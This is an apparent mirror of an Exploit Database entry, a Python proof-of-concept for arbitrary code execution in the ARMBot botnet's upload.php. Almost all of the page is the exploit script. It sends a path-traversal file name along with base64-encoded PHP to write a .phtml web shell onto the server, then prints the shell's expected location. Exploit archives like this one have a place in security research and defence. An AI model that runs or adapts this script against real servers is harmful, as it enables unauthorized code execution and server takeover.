ARMBot Botnet – Arbitrary Code Execution

• Exploit Database
• 12 阅读

• 作者： prsecurity
  日期： 2019-08-05
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47209/

• import requests
  
  URL = "http://127.0.0.1/ARMBot/upload.php"
  r = requests.post(URL,
  data = {
   "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
   "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
   "message":"Bobr Dobr"
  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
  print(r.status_code)
  print("shell should be at http://{}/.s.phtml".format(URL))